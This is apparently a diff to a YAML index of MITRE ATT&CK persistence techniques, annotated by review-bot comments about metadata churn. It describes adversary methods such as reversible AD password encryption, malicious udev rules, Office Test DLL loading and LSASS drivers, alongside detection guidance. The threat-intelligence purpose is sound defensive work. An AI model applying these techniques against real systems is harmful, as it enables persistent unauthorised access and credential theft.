+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
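Review bot: this hunk interleaves the tail of T1556.001 with the head of T1556.005, so the diff alone does not show that nothing was lost; spot-check that T1556.001 keeps `Dell Skeleton` and `TechNet Audit Policy` (it does, at +35026) and that T1556.005 keeps all four references (`store_pwd_rev_enc`, `how_pwd_rev_enc_1`, `how_pwd_rev_enc_2`, `dump_pwd_dcsync`) in the following hunk at +35094. Two substantive changes are easy to miss in the churn: `x_mitre_permissions_required: [Administrator]` disappears from T1556.001, and T1556.005's `modified` jumps from 2022-05-11 to 2024-08-26 with its `x_mitre_version` going from 1.0 to 1.1 in the next hunk. Emitting keys and `external_references` in a fixed order in the generator would keep future diffs to the lines that actually change.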
@@ -34721,6 +35083,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -34731,23 +35094,50 @@ persistence:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -34764,7 +35154,7 @@ persistence:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
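Review bot: the contributor line changes from `Alexander Rodchenko` to `Rodchenko Aleksandr`, which puts the surname first while the neighbouring entry (`Brandon Dalton @PartyD0lphin`) and the rest of the file use given name first; the hunk at -35387 below makes the opposite change (`Goldstein Menachem` to `Menachem Goldstein`). If both are verbatim upstream values, fine, but the two cannot both be normalising toward one convention, so at least one should be double-checked against the ATT&CK source.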
@@ -34823,7 +35213,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -34905,7 +35294,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests: []
T1543.002:
@@ -35020,12 +35408,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1136:
technique:
- modified: '2024-01-31T20:46:43.215Z'
+ modified: '2024-10-15T15:53:21.895Z'
name: Create Account
description: |-
Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -35048,16 +35435,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- Network
- Containers
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
@@ -35084,7 +35470,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.013:
technique:
@@ -35153,7 +35538,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.007:
technique:
@@ -35189,7 +35573,7 @@ persistence:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -35208,12 +35592,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -35263,12 +35646,11 @@ persistence:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -35301,9 +35683,10 @@ persistence:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
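Review bot: splitting `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` into two entries drops the Gurucul affiliation from Naveen Vijayaraghavan, who now appears with no organisation; verify that matches upstream rather than being a side effect of splitting on the comma. The two new entries are also appended after `Arad Inbar, Fidelis Security` instead of staying in the original position, so the contributor order changes without a stated reason.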
@@ -35320,9 +35703,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
@@ -35368,12 +35750,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1653:
technique:
- modified: '2023-09-30T21:28:45.038Z'
+ modified: '2024-10-16T20:11:40.334Z'
name: Power Settings
description: |-
Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -35387,7 +35768,7 @@ persistence:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Juan Tapiador
x_mitre_deprecated: false
x_mitre_detection: "Command-line invocation of tools capable of modifying services
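Review bot: `Goldstein Menachem` becomes `Menachem Goldstein` here, the reverse direction of the T1546.016 change at -34764 (`Alexander Rodchenko` to `Rodchenko Aleksandr`); one of the two is probably a manual edit rather than an upstream value, and the commit message should say which.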
@@ -35446,7 +35827,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.001:
technique:
@@ -35472,7 +35852,7 @@ persistence:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -35498,13 +35878,11 @@ persistence:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1137.002:
technique:
- modified: '2024-04-16T12:41:55.175Z'
+ modified: '2024-10-15T16:01:48.325Z'
name: 'Office Application Startup: Office Test'
description: |-
Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
@@ -35528,8 +35906,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'Command: Command Execution'
@@ -35559,7 +35937,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1137.002
atomic_tests: []
T1547.008:
@@ -35602,7 +35979,7 @@ persistence:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -35627,12 +36004,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -35672,8 +36048,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -35681,13 +36059,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -35718,9 +36096,6 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests:
- name: Creating GCP Service Account and Service Account Key
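Review bot: the removed `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` lines for T1078.004 reappear with identical values earlier in the object (+36048 and +36059), so this hunk is a key reorder plus the usual `spec_version` drop, not a loss of data. The same move repeats for T1556 at +36301 and +36338, while other objects in this patch (T1556.001, T1556.005) keep both keys at the end; a consistent key order in the generator would avoid split hunks like this one.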
@@ -35783,10 +36158,10 @@ persistence:
'
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
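Review bot: the new sentence in the T1053.002 description cites `(Citation: Malicious Life by Cybereason)`, which is only satisfied because the matching `external_references` entry is added further down at +36268; the two hunks have to land together or the citation dangles. The change is documentation-only for this index, since `atomic_tests` for T1053.002 remains `[]` in the hunk at -35905.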
@@ -35849,7 +36224,7 @@ persistence:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -35883,8 +36258,8 @@ persistence:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -35893,6 +36268,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
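Review bot: The new "Malicious Life by Cybereason" reference points at `https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe`; the `#blog-subscribe` fragment targets the subscription widget rather than the article and should be dropped so the URL lands on the cited content. The author is also given as "Philip Tsukerman." while the neighbouring entries use the "Russinovich, M." surname-first form; keep one style within the reference list.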
@@ -35905,12 +36284,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
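Review bot: `spec_version: '2.1'` is removed from T1053.002 here, and the same deletion is repeated on every object this patch touches, with no replacement key. STIX 2.1 treats `spec_version` as a required common property, so if any downstream consumer loads these technique objects as STIX rather than as plain YAML, confirm that consumer no longer needs it; otherwise keep the key. If the removal is the intended normalisation, a one-line note in the commit message would save the next reader from re-checking each object.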
@@ -35923,6 +36301,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
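Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted into T1556 mid-object here, while the `@@ -36015` hunk below shows the same key (and `x_mitre_modified_by_ref`) as unchanged context at the tail of what used to be T1556. Read together the hunks are consistent, because the new `T1546.017` block is inserted before those tail lines and they now close that object, but the diff alignment makes it look like T1556 could end up with the key twice. Worth a duplicate-key pass on the generated file: PyYAML silently keeps the last value for a repeated mapping key, while strict loaders such as ruamel.yaml reject it.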
@@ -35959,17 +36338,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
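Review bot: T1556's platform list drops `Azure AD`, `Google Workspace` and `Office 365` in favour of `Office Suite` and `Identity Provider`. Anything that filters or groups this index by the old platform strings (per-platform index files, dashboards keyed on "Azure AD") will silently match nothing after this change rather than fail loudly, so the consumers of those names should be regenerated or updated in the same change and the version bump to 2.5 called out as carrying a platform rename.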
@@ -36015,9 +36394,65 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.007:
technique:
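Review bot: In the new T1546.017 block the `x_mitre_detection` text names only three rule directories (`/etc/udev/rules.d/`, `/lib/udev/rules.d/`, `/usr/lib/udev/rules.d/`), while the description two paragraphs earlier lists five, adding `/run/udev/rules.d/` and `/usr/local/lib/udev/rules.d/`; file-modification monitoring built from the detection field alone would miss rules dropped into the other two, so the detection string should enumerate all five. Two smaller points in the same field: `/usr/lib/udev/rules.d/` is the only path without backticks, and the quoted scalar ends with a stray space before the closing quote (`2024) '`).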
@@ -36054,7 +36489,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
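Review bot: T1546.007's `modified` timestamp moves backwards here (`2022-05-11T14:00:00.188Z` to `2022-04-20T17:09:17.363Z`), and the same regression appears on T1556.004, T1574.004, T1574.012, T1205.002 and T1568.001 further down. Every removed value shares the `T14:00:00.188Z` time component, which suggests the old dates were batch-set placeholders and the new ones are the upstream timestamps; if that is the case, say so in the commit message, since a reviewer comparing against the previous index will otherwise read these as the wrong bundle being pulled.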
@@ -36078,51 +36513,11 @@ persistence:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1505.001:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Carlos Borges, @huntingneo, CIP
- - Lucas da Silva Pereira, @vulcanunsec, CIP
- - Kaspersky
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
- type: attack-pattern
- created: '2019-12-12T14:59:58.168Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
